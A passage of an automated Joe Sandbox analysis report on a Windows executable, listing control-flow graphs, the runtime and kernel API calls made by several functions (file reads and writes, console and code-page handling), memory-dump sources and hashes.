                                                                        control_flow_graph 1266 ba3260-ba3299 call baa220 1269 ba32a0-ba32a5 1266->1269 1270 ba32f0-ba32f5 1269->1270 1271 ba32a7-ba32ac 1269->1271 1274 ba3323-ba340f 1270->1274 1275 ba32f7-ba32fc 1270->1275 1272 ba32b2-ba32b7 1271->1272 1273 ba3775-ba393f 1271->1273 1277 ba32b9-ba32be 1272->1277 1278 ba3311-ba331f 1272->1278 1279 ba3940-ba3946 1273->1279 1276 ba3410-ba3415 1274->1276 1275->1269 1280 ba32fe-ba330d 1275->1280 1281 ba341b-ba3420 1276->1281 1282 ba34f0-ba34f5 1276->1282 1277->1269 1283 ba32c0-ba32df 1277->1283 1278->1271 1287 ba3321 1278->1287 1284 ba394c-ba3952 1279->1284 1285 ba39e0-ba39e6 1279->1285 1280->1271 1286 ba330f 1280->1286 1288 ba365c-ba3677 call baedc0 1281->1288 1289 ba3426-ba342b 1281->1289 1290 ba34fb-ba3500 1282->1290 1291 ba3633-ba3651 1282->1291 1283->1271 1292 ba32e1-ba32eb 1283->1292 1293 ba3961-ba39cd 1284->1293 1294 ba3954-ba395a 1284->1294 1295 ba39e8-ba39ee 1285->1295 1296 ba3a07-ba3a1a 1285->1296 1286->1270 1287->1270 1309 ba3680-ba3685 1288->1309 1289->1276 1299 ba342d-ba34d6 1289->1299 1290->1276 1300 ba3506-ba362e 1290->1300 1291->1281 1313 ba3657 1291->1313 1292->1270 1293->1284 1302 ba39d3-ba39dd 1293->1302 1294->1279 1301 ba395c-ba4277 call bab950 call baa8e0 call bbe74b 1294->1301 1295->1279 1303 ba39f4-ba39ff 1295->1303 1296->1284 1298 ba3a20 1296->1298 1298->1285 1306 ba34d9-ba34e1 1299->1306 1300->1306 1302->1285 1303->1284 1304 ba3a05 1303->1304 1304->1285 1306->1281 1311 ba34e7 1306->1311 1314 ba36e0-ba36e5 1309->1314 1315 ba3687-ba368c 1309->1315 1311->1282 1313->1282 1320 ba36e7-ba36ec 1314->1320 1321 ba3704-ba374b call bb10a0 1314->1321 1317 ba36bb-ba36d2 1315->1317 1318 ba368e-ba3693 1315->1318 1325 ba36f8-ba3700 1317->1325 1318->1309 1322 ba3695-ba36b7 1318->1322 1320->1309 1324 ba36ee-ba36f3 1320->1324 1326 ba374e-ba376a 1321->1326 1322->1315 1333 ba36b9 1322->1333 1324->1325 1325->1315 1329 ba3702 1325->1329 1326->1271 1330 ba3770 1326->1330 1329->1314 1330->1270 1333->1314
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2279043918.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                        • Associated: 00000000.00000002.2279023228.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279071566.0000000000BE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279089498.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279145817.0000000000BEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279162447.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279218738.0000000000BF7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: `[c$`[c
                                                                        • API String ID: 0-3642393026
                                                                        • Opcode ID: 1f852255f082dd03a544f0d4b34c4c30a574c97272642cec222047c64af792c8
                                                                        • Instruction ID: e52f5323203b7f6cdce899dd05b70f58f2a6bd399ebb9317780a4be19bff6942
                                                                        • Opcode Fuzzy Hash: 1f852255f082dd03a544f0d4b34c4c30a574c97272642cec222047c64af792c8
                                                                        • Instruction Fuzzy Hash: 2882697BF65A100B9708CA7ACC923ABA6C36BD9314F1ED47EA859D7341DD7DCC068680

                                                                        Control-flow Graph

                                                                        APIs
                                                                          • Part of subcall function 00BDDD4E: CreateFileW.KERNELBASE(00000000,00000000,?,00BDD9F2,?,?,00000000,?,00BDD9F2,00000000,0000000C), ref: 00BDDD6B
                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00BDDA5D
                                                                        • __dosmaperr.LIBCMT ref: 00BDDA64
                                                                        • GetFileType.KERNELBASE(00000000), ref: 00BDDA70
                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00BDDA7A
                                                                        • __dosmaperr.LIBCMT ref: 00BDDA83
                                                                        • CloseHandle.KERNEL32(00000000), ref: 00BDDAA3
                                                                        • CloseHandle.KERNEL32(00BD7D3A), ref: 00BDDBF0
                                                                        • GetLastError.KERNEL32 ref: 00BDDC22
                                                                        • __dosmaperr.LIBCMT ref: 00BDDC29
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2279043918.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                        • Associated: 00000000.00000002.2279023228.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279071566.0000000000BE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279089498.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279145817.0000000000BEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279162447.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279218738.0000000000BF7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                                                        Similarity
                                                                        • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                        • String ID:
                                                                        • API String ID: 4237864984-0
                                                                        • Opcode ID: b8dc98c9874930a13532306a6a10e3306e8423e0c5c98af8810fca8752ba1309
                                                                        • Instruction ID: e765a4f9a7852ccd5722461ea9699e37ddc2d4ca44909cab11527e563e25a4c6
                                                                        • Opcode Fuzzy Hash: b8dc98c9874930a13532306a6a10e3306e8423e0c5c98af8810fca8752ba1309
                                                                        • Instruction Fuzzy Hash: C8A14932A141459FCF19AF68DC91BADBBE1EB06324F14019EF8519F3A2EB359C12CB51

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 535 ba76f0-ba775b call bcc7e0 538 ba7760-ba7765 535->538 539 ba77c0-ba77c5 538->539 540 ba7767-ba776c 538->540 543 ba77cb-ba77d0 539->543 544 ba7850-ba7877 539->544 541 ba776e-ba7773 540->541 542 ba7792-ba77aa 540->542 541->538 546 ba7775-ba7790 call ba7e00 541->546 542->540 547 ba77ac 542->547 543->538 545 ba77d2-ba77de 543->545 548 ba7880-ba7886 544->548 549 ba77e1-ba77ef 545->549 561 ba77ae-ba77b8 546->561 547->539 551 ba7888-ba788e 548->551 552 ba78a6-ba78b7 548->552 553 ba77f0-ba77f2 549->553 556 ba78bb-ba78d7 call bcb036 551->556 557 ba7890-ba7896 551->557 552->551 554 ba78b9 552->554 553->549 559 ba77f4-ba77f6 553->559 554->552 568 ba791b-ba7920 556->568 569 ba78d9 556->569 557->548 558 ba7898-ba78a4 557->558 558->551 558->552 562 ba77f8-ba77fe 559->562 563 ba7835-ba784b call bc3cf0 559->563 561->540 565 ba77ba 561->565 566 ba7822-ba7833 562->566 567 ba7800-ba7806 562->567 563->561 565->539 566->562 566->563 567->553 571 ba7808-ba781e 567->571 574 ba7922-ba7927 568->574 575 ba7950-ba7955 568->575 572 ba7a40-ba7a45 569->572 571->562 580 ba7820 571->580 578 ba7a90-ba7a95 572->578 579 ba7a47-ba7a4c 572->579 581 ba79ff-ba7a2f 574->581 582 ba792d-ba7932 574->582 576 ba795b-ba7960 575->576 577 ba7aed-ba7af5 call ba6390 575->577 584 ba7962-ba79bd call bc9ca4 call bcb6fd call bca9ce 576->584 585 ba7910-ba7915 576->585 599 ba7afa-ba7b0e 577->599 588 ba7b8b-ba7ba2 578->588 589 ba7a9b-ba7aa0 578->589 586 ba78de-ba790a call bcc700 579->586 587 ba7a52-ba7a57 579->587 580->563 581->568 583 ba7a35-ba7a3f 581->583 591 ba7938-ba793d 582->591 592 ba7ad1-ba7ae2 582->592 583->572 615 ba79c0-ba79c6 584->615 585->568 585->572 586->585 587->585 594 ba7a5d-ba7a7d 587->594 588->568 597 ba7ba8 588->597 589->585 596 ba7aa6-ba7ac6 589->596 591->585 600 ba793f-ba7bcf call ba7c00 call bbe74b 591->600 592->568 598 ba7ae8 592->598 594->568 603 ba7a83 594->603 596->568 605 ba7acc 596->605 597->572 598->572 599->568 606 ba7b14 599->606 603->572 605->572 606->572 616 ba79ea-ba79fb 615->616 617 ba79c8-ba79ce 615->617 616->617 620 ba79fd 616->620 618 ba7b19-ba7b47 call bcb036 call bcc25c call bcb3b7 call bca9ce 617->618 619 ba79d4-ba79da 617->619 629 ba7b4c-ba7b80 618->629 619->615 622 ba79dc-ba79e8 619->622 620->616 622->616 622->617 629->568 630 ba7b86 629->630 630->572
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2279043918.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                        • Associated: 00000000.00000002.2279023228.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279071566.0000000000BE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279089498.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279145817.0000000000BEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279162447.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279218738.0000000000BF7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                                                        Similarity
                                                                        • API ID: _strlen
                                                                        • String ID: +`^z$+`^z$.bss$W<?$W<?
                                                                        • API String ID: 4218353326-2698662740
                                                                        • Opcode ID: 8a7863db13d87ae9d022915183a713c96c12709644d89298eb8c4ba83ac2009d
                                                                        • Instruction ID: e4525b1ea40e7781472a9579757f5ad3dcbfc84d7bb569b96e03cb3acd1c1d47
                                                                        • Opcode Fuzzy Hash: 8a7863db13d87ae9d022915183a713c96c12709644d89298eb8c4ba83ac2009d
                                                                        • Instruction Fuzzy Hash: F8C18C7064C3409FC7249B28CD95A2FBBE1EB86314F60489EF88A97362DA31DD45CB53

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 1019 bd8319-bd8329 1020 bd832b-bd833e call bc9c07 call bc9bf4 1019->1020 1021 bd8343-bd8345 1019->1021 1038 bd869d 1020->1038 1023 bd834b-bd8351 1021->1023 1024 bd8685-bd8692 call bc9c07 call bc9bf4 1021->1024 1023->1024 1027 bd8357-bd8380 1023->1027 1043 bd8698 call bca319 1024->1043 1027->1024 1030 bd8386-bd838f 1027->1030 1033 bd83a9-bd83ab 1030->1033 1034 bd8391-bd83a4 call bc9c07 call bc9bf4 1030->1034 1036 bd8681-bd8683 1033->1036 1037 bd83b1-bd83b5 1033->1037 1034->1043 1040 bd86a0-bd86a3 1036->1040 1037->1036 1042 bd83bb-bd83bf 1037->1042 1038->1040 1042->1034 1045 bd83c1-bd83d8 1042->1045 1043->1038 1048 bd840d-bd8413 1045->1048 1049 bd83da-bd83dd 1045->1049 1050 bd8415-bd841c 1048->1050 1051 bd83e7-bd83fe call bc9c07 call bc9bf4 call bca319 1048->1051 1052 bd83df-bd83e5 1049->1052 1053 bd8403-bd840b 1049->1053 1055 bd841e 1050->1055 1056 bd8420-bd843e call bcf779 call bcf73f * 2 1050->1056 1082 bd85b8 1051->1082 1052->1051 1052->1053 1054 bd8480-bd849f 1053->1054 1058 bd855b-bd8564 call bdaf04 1054->1058 1059 bd84a5-bd84b1 1054->1059 1055->1056 1092 bd845b-bd847e call bd5fe4 1056->1092 1093 bd8440-bd8456 call bc9bf4 call bc9c07 1056->1093 1070 bd85d5 1058->1070 1071 bd8566-bd8578 1058->1071 1059->1058 1062 bd84b7-bd84b9 1059->1062 1062->1058 1067 bd84bf-bd84e0 1062->1067 1067->1058 1072 bd84e2-bd84f8 1067->1072 1079 bd85d9-bd85ef ReadFile 1070->1079 1071->1070 1076 bd857a-bd8589 GetConsoleMode 1071->1076 1072->1058 1077 bd84fa-bd84fc 1072->1077 1076->1070 1083 bd858b-bd858f 1076->1083 1077->1058 1084 bd84fe-bd8521 1077->1084 1080 bd864d-bd8658 GetLastError 1079->1080 1081 bd85f1-bd85f7 1079->1081 1086 bd865a-bd866c call bc9bf4 call bc9c07 1080->1086 1087 bd8671-bd8674 1080->1087 1081->1080 1088 bd85f9 1081->1088 1090 bd85bb-bd85c5 call bcf73f 1082->1090 1083->1079 1089 bd8591-bd85a9 ReadConsoleW 1083->1089 1084->1058 1091 bd8523-bd8539 1084->1091 1086->1082 1099 bd867a-bd867c 1087->1099 1100 bd85b1-bd85b7 call bc9c1a 1087->1100 1095 bd85fc-bd860e 1088->1095 1097 bd85ab GetLastError 1089->1097 1098 bd85ca-bd85d3 1089->1098 1090->1040 1091->1058 1102 bd853b-bd853d 1091->1102 1092->1054 1093->1082 1095->1090 1105 bd8610-bd8614 1095->1105 1097->1100 1098->1095 1099->1090 1100->1082 1102->1058 1109 bd853f-bd8556 1102->1109 1112 bd862d-bd863a 1105->1112 1113 bd8616-bd8626 call bd8722 1105->1113 1109->1058 1119 bd863c call bd86a4 1112->1119 1120 bd8646-bd864b call bd89c6 1112->1120 1124 bd8629-bd862b 1113->1124 1125 bd8641-bd8644 1119->1125 1120->1125 1124->1090 1125->1124
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2279043918.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                        • Associated: 00000000.00000002.2279023228.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279071566.0000000000BE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279089498.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279145817.0000000000BEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279162447.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279218738.0000000000BF7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 69d185699df5c6ad7715a9b12144ae20d9df36e52225e32b76916340d28eae88
                                                                        • Instruction ID: 30cec61593b76ba7f57e15a71230fa1d52ca4efbf03ed7eafe6641808429d6a5
                                                                        • Opcode Fuzzy Hash: 69d185699df5c6ad7715a9b12144ae20d9df36e52225e32b76916340d28eae88
                                                                        • Instruction Fuzzy Hash: 53B10F70A04249AFDB11DF98D884BBEFBF1EF55325F1441DAE4049B392EB709941CBA0

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 1127 bd0e85-bd0e9e 1128 bd0eb4-bd0eb9 1127->1128 1129 bd0ea0-bd0eb0 call bc7a41 1127->1129 1130 bd0ebb-bd0ec3 1128->1130 1131 bd0ec6-bd0eec call bcf7c7 1128->1131 1129->1128 1136 bd0eb2 1129->1136 1130->1131 1137 bd1062-bd1073 call bbe74b 1131->1137 1138 bd0ef2-bd0efd 1131->1138 1136->1128 1139 bd1055 1138->1139 1140 bd0f03-bd0f08 1138->1140 1144 bd1057 1139->1144 1142 bd0f0a-bd0f13 call bc15b0 1140->1142 1143 bd0f21-bd0f2c call bcf779 1140->1143 1142->1144 1152 bd0f19-bd0f1f 1142->1152 1143->1144 1154 bd0f32 1143->1154 1147 bd1059-bd1060 call bc13ad 1144->1147 1147->1137 1155 bd0f38-bd0f3d 1152->1155 1154->1155 1155->1144 1156 bd0f43-bd0f58 call bcf7c7 1155->1156 1156->1144 1159 bd0f5e-bd0f70 call bd0562 1156->1159 1161 bd0f75-bd0f79 1159->1161 1161->1144 1162 bd0f7f-bd0f87 1161->1162 1163 bd0f89-bd0f8e 1162->1163 1164 bd0fc1-bd0fcd 1162->1164 1163->1147 1165 bd0f94-bd0f96 1163->1165 1166 bd0fcf-bd0fd1 1164->1166 1167 bd104a 1164->1167 1165->1144 1169 bd0f9c-bd0fb6 call bd0562 1165->1169 1170 bd0fe6-bd0ff1 call bcf779 1166->1170 1171 bd0fd3-bd0fdc call bc15b0 1166->1171 1168 bd104c-bd1053 call bc13ad 1167->1168 1168->1144 1169->1147 1182 bd0fbc 1169->1182 1170->1168 1181 bd0ff3 1170->1181 1171->1168 1180 bd0fde-bd0fe4 1171->1180 1183 bd0ff9-bd0ffe 1180->1183 1181->1183 1182->1144 1183->1168 1184 bd1000-bd1018 call bd0562 1183->1184 1184->1168 1187 bd101a-bd1021 1184->1187 1188 bd1023-bd1024 1187->1188 1189 bd1042-bd1048 1187->1189 1190 bd1025-bd1037 call bcf889 1188->1190 1189->1190 1190->1168 1193 bd1039-bd1040 call bc13ad 1190->1193 1193->1147
                                                                        APIs
                                                                        • __alloca_probe_16.LIBCMT ref: 00BD0F0A
                                                                        • __alloca_probe_16.LIBCMT ref: 00BD0FD3
                                                                        • __freea.LIBCMT ref: 00BD103A
                                                                          • Part of subcall function 00BCF779: RtlAllocateHeap.NTDLL(00000000,00000000,00BC990C,?,00BD97AE,C0C2D04E,00000000,?,00BD5F80,00000000,00BC990C,?,EDF9CBD8,?,?,00BC99E6), ref: 00BCF7AB
                                                                        • __freea.LIBCMT ref: 00BD104D
                                                                        • __freea.LIBCMT ref: 00BD105A
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2279043918.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                        • Associated: 00000000.00000002.2279023228.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279071566.0000000000BE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279089498.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279145817.0000000000BEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279162447.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279218738.0000000000BF7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                                                        Similarity
                                                                        • API ID: __freea$__alloca_probe_16$AllocateHeap
                                                                        • String ID:
                                                                        • API String ID: 1423051803-0
                                                                        • Opcode ID: 6ee74ecf115157bc4b25e7049bf49c2b3bd0fc24d5ac3cec69e821ca44642a40
                                                                        • Instruction ID: e499e67c38b2cf447c872f8015a758e3404bbd7a7fb215bb463ff9706165f3c3
                                                                        • Opcode Fuzzy Hash: 6ee74ecf115157bc4b25e7049bf49c2b3bd0fc24d5ac3cec69e821ca44642a40
                                                                        • Instruction Fuzzy Hash: 0251F772610246BFEB216F68DC81EBBBAE9EF44710F1409AEFD04D6241FB35CC509660

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 1335 bd6f73-bd6f95 1336 bd7188 1335->1336 1337 bd6f9b-bd6f9d 1335->1337 1338 bd718a-bd718e 1336->1338 1339 bd6f9f-bd6fbe call bca4c2 1337->1339 1340 bd6fc9-bd6fec 1337->1340 1346 bd6fc1-bd6fc4 1339->1346 1342 bd6fee-bd6ff0 1340->1342 1343 bd6ff2-bd6ff8 1340->1343 1342->1343 1345 bd6ffa-bd700b 1342->1345 1343->1339 1343->1345 1347 bd700d-bd701b call bd6024 1345->1347 1348 bd701e-bd702e call bd72a0 1345->1348 1346->1338 1347->1348 1353 bd7077-bd7089 1348->1353 1354 bd7030-bd7036 1348->1354 1355 bd708b-bd7091 1353->1355 1356 bd70e0-bd7100 WriteFile 1353->1356 1357 bd705f-bd7075 call bd731d 1354->1357 1358 bd7038-bd703b 1354->1358 1362 bd70cc-bd70d9 call bd774c 1355->1362 1363 bd7093-bd7096 1355->1363 1359 bd710b 1356->1359 1360 bd7102-bd7108 GetLastError 1356->1360 1375 bd7058-bd705a 1357->1375 1364 bd703d-bd7040 1358->1364 1365 bd7046-bd7055 call bd76e4 1358->1365 1370 bd710e-bd7119 1359->1370 1360->1359 1374 bd70de 1362->1374 1371 bd70b8-bd70ca call bd7910 1363->1371 1372 bd7098-bd709b 1363->1372 1364->1365 1366 bd7120-bd7123 1364->1366 1365->1375 1378 bd7126-bd7128 1366->1378 1376 bd711b-bd711e 1370->1376 1377 bd7183-bd7186 1370->1377 1382 bd70b3-bd70b6 1371->1382 1372->1378 1379 bd70a1-bd70ae call bd7827 1372->1379 1374->1382 1375->1370 1376->1366 1377->1338 1383 bd712a-bd712f 1378->1383 1384 bd7156-bd7162 1378->1384 1379->1382 1382->1375 1388 bd7148-bd7151 call bc9c80 1383->1388 1389 bd7131-bd7143 1383->1389 1386 bd716c-bd717e 1384->1386 1387 bd7164-bd716a 1384->1387 1386->1346 1387->1336 1387->1386 1388->1346 1389->1346
                                                                        APIs
                                                                          • Part of subcall function 00BD731D: GetConsoleOutputCP.KERNEL32(43400BE8,00000000,00000000,?), ref: 00BD7380
                                                                        • WriteFile.KERNEL32(?,?,?,?,00000000,?,00000000,?,?,?,?,?,00BC5731,?,00BC5993), ref: 00BD70F8
                                                                        • GetLastError.KERNEL32(?,00BC5731,?,00BC5993,?,00BC5993,?,?,?,00000000,?,?,00000000,?,?,?), ref: 00BD7102
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2279043918.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                        • Associated: 00000000.00000002.2279023228.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279071566.0000000000BE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279089498.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279145817.0000000000BEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279162447.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279218738.0000000000BF7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                                                        Similarity
                                                                        • API ID: ConsoleErrorFileLastOutputWrite
                                                                        • String ID:
                                                                        • API String ID: 2915228174-0
                                                                        • Opcode ID: 51f710324fd2e58f5584f76099381058fa70e04901b647d52941b78e6951c87b
                                                                        • Instruction ID: c8e657b40b3a2165e03b960411484acd1e7ad529ab7bd527764397415552544f
                                                                        • Opcode Fuzzy Hash: 51f710324fd2e58f5584f76099381058fa70e04901b647d52941b78e6951c87b
                                                                        • Instruction Fuzzy Hash: E9618171904119AEDF11DFA8D884AEEFBF9EB09304F14018AE900A7352FB31D905CBA0

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 1392 bd12dc-bd1304 call bd14e1 1395 bd14c9-bd14ca call bd1552 1392->1395 1396 bd130a-bd1310 1392->1396 1399 bd14cf-bd14d1 1395->1399 1398 bd1313-bd1319 1396->1398 1400 bd131f-bd132b 1398->1400 1401 bd1415-bd1434 call bc4270 1398->1401 1403 bd14d2-bd14e0 call bbe74b 1399->1403 1400->1398 1404 bd132d-bd1333 1400->1404 1410 bd1437-bd143c 1401->1410 1407 bd140d-bd1410 1404->1407 1408 bd1339-bd1345 IsValidCodePage 1404->1408 1407->1403 1408->1407 1409 bd134b-bd1352 1408->1409 1412 bd1374-bd1381 GetCPInfo 1409->1412 1413 bd1354-bd1360 1409->1413 1414 bd143e-bd1443 1410->1414 1415 bd1479-bd1483 1410->1415 1418 bd1401-bd1407 1412->1418 1419 bd1383-bd13a2 call bc4270 1412->1419 1417 bd1364-bd136f 1413->1417 1420 bd1445-bd144d 1414->1420 1421 bd1476 1414->1421 1415->1410 1416 bd1485-bd14af call bd182d 1415->1416 1431 bd14b0-bd14bf 1416->1431 1423 bd14c1-bd14c2 call bd186b 1417->1423 1418->1395 1418->1407 1419->1417 1433 bd13a4-bd13ab 1419->1433 1425 bd144f-bd1452 1420->1425 1426 bd146e-bd1474 1420->1426 1421->1415 1432 bd14c7 1423->1432 1430 bd1454-bd145a 1425->1430 1426->1414 1426->1421 1430->1426 1434 bd145c-bd146c 1430->1434 1431->1423 1431->1431 1432->1399 1435 bd13ad-bd13b2 1433->1435 1436 bd13d7-bd13da 1433->1436 1434->1426 1434->1430 1435->1436 1437 bd13b4-bd13bc 1435->1437 1438 bd13df-bd13e6 1436->1438 1439 bd13cf-bd13d5 1437->1439 1440 bd13be-bd13c5 1437->1440 1438->1438 1441 bd13e8-bd13fc call bd182d 1438->1441 1439->1435 1439->1436 1443 bd13c6-bd13cd 1440->1443 1441->1417 1443->1439 1443->1443
                                                                        APIs
                                                                          • Part of subcall function 00BD14E1: GetOEMCP.KERNEL32(00000000,?,?,C0C2D04E,?), ref: 00BD150C
                                                                        • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,?,?,?,?,00BD16EC,?,00000000,?,C0C2D04E,?), ref: 00BD133D
                                                                        • GetCPInfo.KERNEL32(00000000,?,?,?,?,?,?,?,?,00BD16EC,?,00000000,?,C0C2D04E,?), ref: 00BD1379
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2279043918.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                        • Associated: 00000000.00000002.2279023228.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279071566.0000000000BE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279089498.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279145817.0000000000BEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279162447.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279218738.0000000000BF7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                                                        Similarity
                                                                        • API ID: CodeInfoPageValid
                                                                        • String ID:
                                                                        • API String ID: 546120528-0
                                                                        • Opcode ID: e28b3d0ec5c841670296f417952cd704eabd094565c42a1c361c00065b59640e
                                                                        • Instruction ID: 6cd39c55453ffde88c0218f1e47a891a1370cc1bb862e60075d8b5c5a54bd5a2
                                                                        • Opcode Fuzzy Hash: e28b3d0ec5c841670296f417952cd704eabd094565c42a1c361c00065b59640e
                                                                        • Instruction Fuzzy Hash: 8951E370A00245BEDB21CF79C881AAAFBF5EF41314F1489AFD0968B752F6749946CF50

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 1445 bd774c-bd77a1 call bc19d0 1448 bd7816-bd7826 call bbe74b 1445->1448 1449 bd77a3 1445->1449 1451 bd77a9 1449->1451 1453 bd77af-bd77b1 1451->1453 1454 bd77cb-bd77f0 WriteFile 1453->1454 1455 bd77b3-bd77b8 1453->1455 1458 bd780e-bd7814 GetLastError 1454->1458 1459 bd77f2-bd77fd 1454->1459 1456 bd77ba-bd77c0 1455->1456 1457 bd77c1-bd77c9 1455->1457 1456->1457 1457->1453 1457->1454 1458->1448 1459->1448 1460 bd77ff-bd780a 1459->1460 1460->1451 1461 bd780c 1460->1461 1461->1448
                                                                        APIs
                                                                        • WriteFile.KERNELBASE(?,?,?,?,00000000,00000000,00000000,?,?,00BD70DE,?,00BC5993,?,?,?,00000000), ref: 00BD77E8
                                                                        • GetLastError.KERNEL32(?,00BD70DE,?,00BC5993,?,?,?,00000000,?,?,?,?,?,00BC5731,?,00BC5993), ref: 00BD780E
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2279043918.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                        • Associated: 00000000.00000002.2279023228.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279071566.0000000000BE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279089498.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
